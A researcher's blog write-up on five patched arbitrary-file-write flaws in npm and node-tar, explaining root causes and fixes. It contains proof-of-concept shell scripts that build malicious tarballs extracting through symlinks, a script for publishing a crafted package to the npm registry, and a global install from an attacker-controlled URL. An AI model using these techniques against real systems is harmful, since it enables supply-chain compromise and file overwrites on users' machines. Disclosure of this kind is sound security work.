5 RCEs in npm for $15,000


I found and reported these vulnerabilities with @ginkoid.


In this post, I will discuss the root cause of these vulnerabilities, as well as briefly walk through the exploitation process. I’ll also include some thoughts about bug bounty in general at the end.


These are the associated CVEs and payouts:


CVE-2021-39134 affects @npmcli/arborist. The others affect node-tar.


Background

Around the middle of July, GitHub launched a private bug bounty program that focused on the npm CLI.


We noticed an interesting item in scope:


  • RCE that breaks out of --ignore-scripts at install or update with no other interaction

This seems like a rather large attack surface. npm install is responsible for pulling down tar files from the npm registry, organizing dependencies, and possibly running install scripts (although presumably that would be disabled with --ignore-scripts).


Before approaching any target, it’s usually a good idea to do a bit of preliminary analysis to see what the attack surface looks like. We came across CVE-2019-16776 which involved improper path checks on binary fields. We audited the relevant code but didn’t find anything.


We needed to go deeper.

npm’s package installation architecture uses a variety of self-maintained packages. Some of the more complex ones we audited included node-tar and @npmcli/arborist.


As a side note, we noticed that most of the underlying packages for npm were maintained by a few authors.


insert relevant xkcd


I think it’s somewhat humbling to consider the vastness of Internet infrastructure. Every day, we use millions of lines of code which we assume to be secure. With such a popular dependency – node-tar had 25 million weekly downloads as of this post – somebody must have checked the code.


Right?


(Un)fortunately the answer to the previous question is no, or I suppose I wouldn’t be writing this post.


Absolute

One of the security guarantees that node-tar provides is that extraction can only overwrite files under the given directory. If an extraction could overwrite global files, a malicious tar file could overwrite any file on your system.


For example, the npm install command deals entirely with untrusted tarballs. Aside from ensuring the uploaded tarball is syntactically valid, very little additional sanitization was performed.

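Concretely, that extraction boils down to a node-tar call along these lines (a sketch, not npm’s exact invocation; the file names here are made up):

// a sketch of extracting a registry tarball with node-tar; the exact options
// npm passes are not reproduced here
const tar = require('tar')

tar.x({
  file: 'attacker-controlled.tgz',   // tarball downloaded from the registry
  cwd: 'node_modules/some-package',  // writes are supposed to stay under this directory
  strip: 1,                          // registry tarballs nest their contents under a package/ prefix
})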

Note that after our reports, npm started applying stricter filters.


on July 29, 2021 we started blocking the publication of npm packages that contain symbolic links, hard links, or absolute paths.


Package tarball extraction also happens even with --ignore-scripts, making this a very interesting attack surface for this particular bug bounty program.


Zero

The first vulnerability we reported was an arbitrary file write in the npm CLI. See if you can spot the vulnerability.


      // p = `entry.path` is attacker controlled

      // absolutes on posix are also absolutes on win32
      // so we only need to test this one to get both
      if (path.win32.isAbsolute(p)) {
        const parsed = path.win32.parse(p)
        entry.path = p.substr(parsed.root.length)
        const r = parsed.root
        this.warn('TAR_ENTRY_INFO', `stripping ${r} from absolute path`, {
          entry,
          path: p,
        })
      }

      // do file operations with `entry.path`

While auditing node-tar, we immediately found this code suspicious. File paths are pretty complex; would naively taking a substring work? We can easily confirm any assumptions with the node CLI.


> path.win32.parse("///tmp/pwned")
{ root: '/', dir: '///tmp', base: 'pwned', ext: '', name: 'pwned' }

Hmm… This would set parsed.root to /. After stripping, entry.path would become //tmp/pwned. This will then resolve to our absolute path, bypassing the original check!


> path.resolve("//tmp/pwned")
'/tmp/pwned'

Note that although node-tar does not do an explicit path.resolve, we suspected that node’s file operation API would internally do some sort of resolve. We can confirm this hypothesis by either looking at node’s source code, or just manually testing the relevant fs operations.


> fs.existsSync("/tmp/pwned")
false
> fs.writeFileSync("//tmp/pwned", "notdeghost")
undefined
> fs.existsSync("/tmp/pwned")
true

For now, the latter is easier (but we’ll come back to node source later).


This vulnerability allows us to write to any file upon package installation.

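Condensed, the chain looks like this (a simplified reconstruction of the logic above, not the code npm actually runs):

const path = require('path')
const fs = require('fs')

// simplified reproduction of the vulnerable strip: one root removed, once
const stripOnce = p =>
  path.win32.isAbsolute(p) ? p.substr(path.win32.parse(p).root.length) : p

const entryPath = '///tmp/pwned'      // attacker-controlled path inside the tarball
const stripped = stripOnce(entryPath) // '//tmp/pwned' -- not checked again, still resolves to /tmp/pwned
fs.writeFileSync(stripped, 'pwned')   // node's fs normalizes '//tmp/pwned' to '/tmp/pwned'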

To publish this to the registry, we can issue a PUT request to registry.npmjs.org.

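A rough sketch of such a publish request, following the registry’s CouchDB-style publish format (roughly what npm publish sends under the hood). The package name, tarball, and token below are placeholders, and required metadata like shasum/integrity hashes is omitted:

// rough sketch of a registry publish (Node 18+ for global fetch); names and the
// token are placeholders, and dist integrity metadata is omitted for brevity
const fs = require('fs')

const name = 'innocent-looking-package'
const version = '1.0.0'
const tarball = fs.readFileSync('payload.tgz')

const body = {
  _id: name,
  name,
  'dist-tags': { latest: version },
  versions: {
    [version]: {
      name,
      version,
      dist: { tarball: `https://registry.npmjs.org/${name}/-/${name}-${version}.tgz` },
    },
  },
  _attachments: {
    [`${name}-${version}.tgz`]: {
      content_type: 'application/octet-stream',
      data: tarball.toString('base64'),
      length: tarball.length,
    },
  },
}

fetch(`https://registry.npmjs.org/${name}`, {
  method: 'PUT',
  headers: {
    authorization: `Bearer ${process.env.NPM_TOKEN}`,
    'content-type': 'application/json',
  },
  body: JSON.stringify(body),
}).then(res => console.log(res.status, res.statusText))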

One

The patch to this was quite comprehensive.


// unix absolute paths are also absolute on win32, so we use this for both
const { isAbsolute, parse } = require('path').win32

// returns [root, stripped]
module.exports = path => {
  let r = ''
  while (isAbsolute(path)) {
    // windows will think that //x/y/z has a "root" of //x/y/
    const root = path.charAt(0) === '/' ? '/' : parse(path).root
    path = path.substr(root.length)
    r += root
  }
  return [r, path]
}

The absolute path check was refactored out into a separate file. Note how the while (isAbsolute(path)) loop provides a strict guarantee that the returned path will never be isAbsolute.

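For example, feeding the earlier payload through the new helper (assuming it’s saved locally as strip-absolute-path.js) strips every leading root:

const stripAbsolutePath = require('./strip-absolute-path.js')

console.log(stripAbsolutePath('///tmp/pwned'))  // [ '///', 'tmp/pwned' ]
console.log(stripAbsolutePath('C:/x'))          // [ 'C:/', 'x' ]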

diff --git a/lib/unpack.js b/lib/unpack.js
index 7d4b79d..216fa71 100644
--- a/lib/unpack.js
+++ b/lib/unpack.js
@@ -14,6 +14,7 @@ const path = require('path')
 const mkdir = require('./mkdir.js')
 const wc = require('./winchars.js')
 const pathReservations = require('./path-reservations.js')
+const stripAbsolutePath = require('./strip-absolute-path.js')

 const ONENTRY = Symbol('onEntry')
 const CHECKFS = Symbol('checkFs')
@@ -224,11 +225,10 @@ class Unpack extends Parser {

       // absolutes on posix are also absolutes on win32
       // so we only need to test this one to get both
-      if (path.win32.isAbsolute(p)) {
-        const parsed = path.win32.parse(p)
-        entry.path = p.substr(parsed.root.length)
-        const r = parsed.root
-        this.warn('TAR_ENTRY_INFO', `stripping ${r} from absolute path`, {
+      const [root, stripped] = stripAbsolutePath(p)
+      if (root) {
+        entry.path = stripped
+        this.warn('TAR_ENTRY_INFO', `stripping ${root} from absolute path`, {
           entry,
           path: p,
         })

This “never absolute” path is then assigned to entry.path. Surely this is secure, right?


Note that paths with double dots are also filtered out, so we can’t just escape with a path like ../../overwrite.


      if (p.match(/(^|\/|\\)\.\.(\\|\/|$)/)) {
        this.warn('TAR_ENTRY_ERROR', `path contains '..'`, {
          entry,
          path: p,
        })
        return false
      }

Another interesting thought experiment:


// entry.path is attacker controlled, but can't be `isAbsolute`. 
entry.absolute = path.resolve(this.cwd, entry.path)
// do file operations with entry.absolute

We can assume that the original entry.path is not an absolute path. Thus, we can essentially ignore the effects of the stripAbsolutePath function and consider only paths that aren’t absolute.


In general, when looking for vulnerabilities, it’s often helpful to reduce the problem to an equivalent but simpler problem.


What is an absolute path? Paths that start with / appear to be absolute, but are there any edge cases?


> path.win32.isAbsolute("/")
true
> path.win32.isAbsolute("///")
true
> path.win32.isAbsolute("C:/")
true

When we’re faced with such implementation-dependent questions (is there even a spec for file systems?), the best option is to go back to the source.


Note that for isAbsolute as defined here, there are two different implementations for posix and windows. Because node-tar uses path.win32, we want to make sure we’re looking at the Windows one.


function isPathSeparator(code) {
  return code === CHAR_FORWARD_SLASH || code === CHAR_BACKWARD_SLASH;
}

function isWindowsDeviceRoot(code) {
  return (code >= CHAR_UPPERCASE_A && code <= CHAR_UPPERCASE_Z) ||
         (code >= CHAR_LOWERCASE_A && code <= CHAR_LOWERCASE_Z);
}

// ...

  /**
   * @param {string} path
   * @returns {boolean}
   */
  isAbsolute(path) {
    validateString(path, 'path');
    const len = path.length;
    if (len === 0)
      return false;

    const code = StringPrototypeCharCodeAt(path, 0);
    return isPathSeparator(code) ||
      // Possible device root
      (len > 2 &&
      isWindowsDeviceRoot(code) &&
      StringPrototypeCharCodeAt(path, 1) === CHAR_COLON &&
      isPathSeparator(StringPrototypeCharCodeAt(path, 2)));
  },

This confirms our suspicions. There are two cases for absolute paths. First, the path can begin with a / or a \. Alternatively, the path can look like a drive root, for example C:/ or C:\.


What does path.resolve do then? We can look at the source code again, but the function is 148 lines long. During our actual analysis, I spent quite some time trying to understand the source – printf debugging saved the day here. For the purposes of this blog post, I’ll skip to the “cheat code”.


Enter test-path-resolve.js.


const resolveTests = [
  [ path.win32.resolve,
    // Arguments                               result
    [[['c:/blah\\blah', 'd:/games', 'c:../a'], 'c:\\blah\\a'],

What’s going on here? Is there special handling for paths of the form C:${PATH}?


> path.resolve('C:/example/dir', 'C:../a')
'C:\\example\\a'
> path.resolve('C:/example/dir', 'D:different/root')
'D:\\different\\root'

It appears so. This is our bypass!


Note that even though double dots are filtered out, the regex only matches double dots adjacent to a path delimiter or the start/end of the string, a check that C:../ passes.

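It’s easy to convince ourselves of this with the filter’s regex:

const dotdot = /(^|\/|\\)\.\.(\\|\/|$)/      // the filter from the snippet above

console.log(dotdot.test('../../overwrite'))  // true  -- rejected
console.log(dotdot.test('C:../a'))           // false -- the '..' is preceded by ':', so it slips through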

Unfortunately, the primitive we get here isn’t the best – we can only write into paths one directory up. Because the extraction occurs in a node_modules directory, we are only able to write into other installed packages, which doesn’t give a direct path for escalation.


An idea we explored was writing into a symlinked package. For example, we create a package AAAA which is symlinked to /path/to/. We then extract into C:../AAAA/overwrite. This would – in theory – overwrite /path/to/overwrite.


This exploit strategy involved a race condition and was not very reliable.


We reported this vulnerability with a proof of concept, but unfortunately it was already discovered by a member of GitHub’s security team.


Caches

Like many tar implementations, node-tar allows for the extraction of symlinks and hardlinks.


      case 'Link':
        return this[HARDLINK](entry, done)

      case 'SymbolicLink':
        return this[SYMLINK](entry, done)

In order to prevent overwriting arbitrary files on the file system, node-tar will check to make sure that the folders it iterates over are not symlinks. Otherwise, you could use the symlink to traverse the file system. For example, create a symlink symlink -> /path/to and extract a file to symlink/overwrite.

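The check is needed because purely textual path handling can’t see symlinks; a quick sketch (the paths here are made up):

const path = require('path')

// textually, the entry stays inside the extraction directory...
const cwd = '/home/user/extract'
console.log(path.resolve(cwd, 'symlink/overwrite'))  // '/home/user/extract/symlink/overwrite'
// ...but if 'symlink' is a link to /path/to on disk, the kernel follows it,
// and the write actually lands in /path/to/overwrite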

Interestingly, this check is done in mkdir.js, when creating the required parent directories for any given path.


      } else if (st.isSymbolicLink())
        return cb(new SymlinkError(part, part + '/' + parts.join('/')))

node-tar also maintains a cache of the directories already created as a performance optimization. This has the important implication of skipping the symlink checks for folders that exist in the directory cache.


  if (cache && cache.get(dir) === true)
    return done()

In other words, the security of node-tar depends on the accuracy of the directory cache. If we can fake an entry or otherwise desynchronize the cache, we can extract through a symlink and write to arbitrary files on the filesystem.

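Put differently, the per-directory logic boils down to something like this (a heavily condensed sketch, not the actual mkdir.js code):

const fs = require('fs')

function ensureDir (dir, cache) {
  if (cache.get(dir) === true)
    return                                   // cached as "known good": the symlink check is skipped
  if (fs.existsSync(dir)) {
    if (fs.lstatSync(dir).isSymbolicLink())
      throw new Error(`refusing to extract through symlink ${dir}`)
  } else {
    fs.mkdirSync(dir)
  }
  cache.set(dir, true)                       // every later entry under dir trusts this result
}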

Unfortunately, these vulnerabilities do not affect the npm cli, because npm’s extraction explicitly filters out symlinks and hardlinks.


      filter: (name, entry) => {
        if (/Link$/.test(entry.type))
          return false

Zero

Initially, the directory cache did not purge entries on folder deletion. This made it pretty easy to bypass.


For our proof of concept, we used three files:


  1. MKDIR poison
  2. SYMLINK poison -> /target/path
  3. FILE poison/overwrite

This payload can be generated from a bash script with:


#!/bin/sh

mkdir x
tar cf poc.tar x
rmdir x
ln -s /tmp x
echo 'arbitrary file write in node-tar' > x/pwned
tar rf poc.tar x x/pwned
rm x/pwned x

This works because, at the time of reporting, the symlink step would implicitly delete any existing folder or file it encountered at its destination. Note how the code does not update the directory cache.


          } else
            fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry, done))
        } else
          unlinkFile(entry.absolute, er => this[MAKEFS](er, entry, done))

Testing this is quite simple too.


$ npm i tar@6.1.1
$ node -e 'require("tar").x({ file: "poc.tar" })'
$ cat /tmp/pwned
arbitrary file write in node-tar

One

The solution to this was, perhaps intuitively, to remove the entry from the directory cache.


commit 9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20
Author: isaacs <i@izs.me>
Date:   Mon Jul 26 16:10:30 2021 -0700

    Remove paths from dirCache when no longer dirs

This patch added the following code to lib/unpack.js.


    // if we are not creating a directory, and the path is in the dirCache,
    // then that means we are about to delete the directory we created
    // previously, and it is no longer going to be a directory, and neither
    // is any of its children.
    if (entry.type !== 'Directory') {
      for (const path of this.dirCache.keys()) {
        if (path === entry.absolute ||
            path.indexOf(entry.absolute + '/') === 0 ||
            path.indexOf(entry.absolute + '\\') === 0)
          this.dirCache.delete(path)
      }
    }

Note how, in theory, path.indexOf(entry.absolute + '/') and path.indexOf(entry.absolute + '\\') will purge all entries that have our current path as a prefix.


Why do we have two checks, for slash and backslash? Shouldn’t this be conditioned on the current environment – i.e., backslash if it’s Windows and slash if it’s not?


It turns out the original test case still worked on Windows, even with this patch. To understand why, we need to look at how the directory cache entries are populated.


  const sub = path.relative(cwd, dir)
  const parts = sub.split(/\/|\\/)
  let created = null
  for (let p = parts.shift(), part = cwd;
    p && (part += '/' + p);
    p = parts.shift()) {
    if (cache.get(part))
      continue
      
    try {
      fs.mkdirSync(part, mode)
      created = created || part
      cache.set(part, true)
    } catch (er) {

It looks like the path is being split on both back and forward slashes. The entries are then joined with forward slashes before being inserted into the directory cache.


For example:


  • directory cache: C:\abc\test-unpack/x
  • entry.absolute: C:\abc\test-unpack\x

When we create the directory, ...\test-unpack/x will be inserted into the directory cache. When we try and remove a folder, entry.absolute will be ...\test-unpack\x.


This means the following checks will never be satisfied.


        if (path === entry.absolute ||
            path.indexOf(entry.absolute + '/') === 0 ||
            path.indexOf(entry.absolute + '\\') === 0)

We would be checking for ...\test-unpack\x, ...\test-unpack\x/, and ...\test-unpack\x\, none of which match ...\test-unpack/x.

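A tiny reproduction of the mismatch, using the paths from the example above:

const dirCache = new Map([['C:\\abc\\test-unpack/x', true]])  // key as mkdir recorded it
const absolute = 'C:\\abc\\test-unpack\\x'                    // path as the pruning code sees it

const matches = [...dirCache.keys()].filter(p =>
  p === absolute ||
  p.indexOf(absolute + '/') === 0 ||
  p.indexOf(absolute + '\\') === 0)

console.log(matches)  // [] -- the stale directory entry is never purged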

Thus, we can remove a folder without purging the corresponding entry from the directory cache. Then when we extract through the symlink, it will renormalize the path with forward slashes, thus aborting early and skipping the security checks.


A different issue, but with the same root cause, exists on Unix.


If we create a path with name a\\x, security checks will be performed on a and a/x but not the actual file a\\x. Thus, if we create our symlink with a filename that contains a backslash, we will be able to bypass the directory cache protections again!


#!/bin/sh

ln -s /tmp a\\x
tar cf poc.tar a\\x
echo 'arbitrary file write in node-tar' > a\\x/pwned
tar rf poc.tar a\\x a\\x/pwned
rm a\\x

Two

The patch to this felt very “defense in depth”.


commit 53602669f58ddbeb3294d7196b3320aaaed22728
Author: isaacs <i@izs.me>
Date:   Wed Aug 4 15:48:21 2021 -0700

fix: normalize paths on Windows systems

This change uses / as the One True Path Separator, as the gods of POSIX
intended in their divine wisdom.

On windows, \ characters are converted to /, everywhere and in depth.
However, on posix systems, \ is a valid filename character, and is not
treated specially.  So, instead of splitting on `/[/\\]/`, we can now
just split on `'/'` to get a set of path parts.

This does mean that archives with entries containing \ will extract
differently on Windows systems than on correct systems.  However, this
is also the behavior of both bsdtar and gnutar, so it seems appropriate
to follow suit.

Additionally, dirCache pruning is now done case-insensitively.  On
case-sensitive systems, this potentially results in a few extra lstat
calls.  However, on case-insensitive systems, it prevents incorrect
cache hits.

All directory cache operations are routed through helper functions, which normalize entries.


const cGet = (cache, key) => cache.get(normPath(key))
const cSet = (cache, key, val) => cache.set(normPath(key), val)
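
normPath isn’t shown in this excerpt; roughly, it rewrites backslashes to forward slashes on Windows and is an identity function elsewhere:

// approximate behavior of node-tar's normalize-windows-path helper
const normPath = process.platform === 'win32'
  ? p => p && p.replace(/\\/g, '/')
  : p => p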

Cache removal was also refactored out into a centralized place.


const pruneCache = (cache, abs) => {
  // clear the cache if it's a case-insensitive match, since we can't
  // know if the current file system is case-sensitive or not.
  abs = normPath(abs).toLowerCase()
  for (const path of cache.keys()) {
    const plower = path.toLowerCase()
    if (plower === abs || plower.toLowerCase().indexOf(abs + '/') === 0)
      cache.delete(path)
  }
}

Note that this also handles case-insensitive file systems, such as Windows and macOS.


This should be enough right?


Not quite. NFD normalization saves (ruins?) the day.


It turns out macOS does additional normalization of paths, violating the assumptions behind the directory cache.


> fs.readdirSync(".")
[]
> fs.writeFileSync("\u00e9", "AAAA")
undefined
> fs.readdirSync(".")
[ 'é' ]
> fs.unlinkSync("\u0065\u0301")
undefined
> fs.readdirSync(".")
[]

The exploit strategy should be pretty straightforward at this point. We create a folder named \u00e9, a symlink named \u0065\u0301 (which also deletes the first folder), and finally write to \u00e9/pwned.


Because only \u00e9 exists in the directory cache and not \u0065\u0301, the directory cache becomes desynchronized from the file system, allowing us to skip the symlink security checks.

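At the string level the two names never compare equal, which is exactly why the cache and the file system end up disagreeing:

const nfc = '\u00e9'         // 'é' as a single precomposed code point
const nfd = '\u0065\u0301'   // 'e' followed by a combining acute accent

console.log(nfc === nfd)                   // false -- so they get separate dirCache entries
console.log(nfc.normalize('NFD') === nfd)  // true  -- but macOS treats them as the same file name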

Unfortunately, this was also already found internally by a member of GitHub’s security team, but it was a rather interesting vulnerability nonetheless. As a side note, JarLob’s discovery also involved “long path portions” which we hadn’t considered.


Fin


We reported a series of three vulnerabilities involving the directory cache. In general, we felt that the directory cache was quite difficult to maintain. Any inconsistency with the filesystem leads to an arbitrary write vulnerability. Filesystems are deceptively complex, with annoying edge cases on every system that has to be supported.


In the end, the decision was made to drop the entire directory cache when a symlink was encountered. In hindsight, this was probably the best solution.


commit 23312ce7db8a12c78d0fba96d7664a01619266a3
Author: isaacs <i@izs.me>
Date:   Wed Aug 18 19:34:33 2021 -0700

    drop dirCache for symlink on all platforms

diff --git a/lib/unpack.js b/lib/unpack.js
index b889f4f..7f397f1 100644
--- a/lib/unpack.js
+++ b/lib/unpack.js
@@ -550,13 +550,13 @@ class Unpack extends Parser {
     // then that means we are about to delete the directory we created
     // previously, and it is no longer going to be a directory, and neither
     // is any of its children.
-    // If a symbolic link is encountered on Windows, all bets are off.
-    // There is no reasonable way to sanitize the cache in such a way
-    // we will be able to avoid having filesystem collisions.  If this
-    // happens with a non-symlink entry, it'll just fail to unpack,
-    // but a symlink to a directory, using an 8.3 shortname, can evade
-    // detection and lead to arbitrary writes to anywhere on the system.
-    if (isWindows && entry.type === 'SymbolicLink')
+    // If a symbolic link is encountered, all bets are off.  There is no
+    // reasonable way to sanitize the cache in such a way we will be able to
+    // avoid having filesystem collisions.  If this happens with a non-symlink
+    // entry, it'll just fail to unpack, but a symlink to a directory, using an
+    // 8.3 shortname or certain unicode attacks, can evade detection and lead
+    // to arbitrary writes to anywhere on the system.
+    if (entry.type === 'SymbolicLink')
       dropCache(this.dirCache)

Additional Thoughts

I think these reports illustrate some interesting implications about bug bounty, and I wanted to take some time to write about my thoughts. There won’t be any security analysis in this section, so if you’re so inclined, feel free to skip to the conclusion.


Also as a disclaimer, these thoughts are based on my – somewhat limited – experiences as a bug bounty program participant. That being said, GitHub’s bounty program is one of the best we’ve hacked against, and I’ll illustrate how some of their practices help make this such an enjoyable program to engage with.


Asymmetry


Perhaps most importantly, there’s an inherent asymmetry between bug bounty reporters and internal red teams, which (in some instances heavily) favors internal teams.


I think the root cause of this is that bug bounty participants are expected to fully, or nearly fully, demonstrate the impact of their vulnerabilities before reporting. At the same time, they must not hold on to their vulnerabilities for too long.


It’s hard to balance these two.


An example of this can be found in CVE-2021-37713. I had actually found this vulnerability on my plane ride to Defcon (at the time I joked that it had paid for the flight). However, we didn’t report it until August 13th, a bit more than a week later.


The reason for the delayed report was that we wanted a way to escalate from a very low-impact relative path overwrite to an actual RCE. We suspected it was possible by abusing symlinks and other node-specific behavior, but it took a while to get a proof of concept working.


Another example of asymmetry would be suspicious behavior where we don’t know if there are security implications. This might not be the best example because I suspect there are no real implications here, but we knew the path reservation system improperly handled case-sensitive file systems (although I suppose this is relatively trivial to find through variant analysis).


We couldn’t actually report this because we hadn’t found any security implications – if one existed, it would be racy.


I think these asymmetries are inherent in bug bounty. At the same time, I feel like it’s important for program administrators to be aware of such biases, and if possible compensate for them.


A good example of this would be the token bounty we received for CVE-2021-37712. Even though this vulnerability was already discovered internally, GitHub was nice enough to give us $1,000. This helped offset the time we put into investigating and producing a full POC. Perhaps more importantly, such a token bounty showed that GitHub cared about our engagement with their program.


Balance


Why do people do bug bounty?


To secure software? Or money? The world can never be described in absolutes. I suppose the real answer is some mixture of the two, and people fall in various places on that spectrum.


Perhaps this could be better illustrated with an example.


We noticed another interesting entry in scope.


  • Overwriting an executable that already exists with a globally installed package if --force has not been set

After some correspondence with GitHub staff, we confirmed this was how the vulnerability scope was intended to be defined:


$ npm i -g yarn
$ npm i -g attacker-package
$ yarn # if we control yarn, it's a vulnerability

It turns out that this is trivially achievable by installing from a URL.


$ sudo npm i -g https://attacker.com/package.tar.gz

However, this was also marked as a “low” impact item according to our engagement documentation, and we thought that it probably wasn’t a serious concern. It seemed to be by design, and the use case for such a bug seemed extremely narrow.


In the end, we chose not to report it.


A report is an affirmation that a vulnerability exists. As bug bounty hunters we don’t want to spam programs with low-impact pseudo-vulnerabilities. There’s often a balance between reporting only real impactful issues and trying to simply maximize bounties.


I think this also illustrates the importance of clearly defining scope items when creating private bug bounty programs. There’s always room for ambiguity, and having additional ways to communicate – for example, there’s a private GitHub bounty program Slack – is crucial for clearing up any confusion.


Conclusion

Overall, this engagement was quite enjoyable. We got to audit sections of node and npm internals which I – and I believe many others – assumed to be secure.


Every day, we run countless lines of code but never consider who’s responsible for auditing them. Is absolute security possible?


Complexity breeds vulnerability; optimization demands compensation.
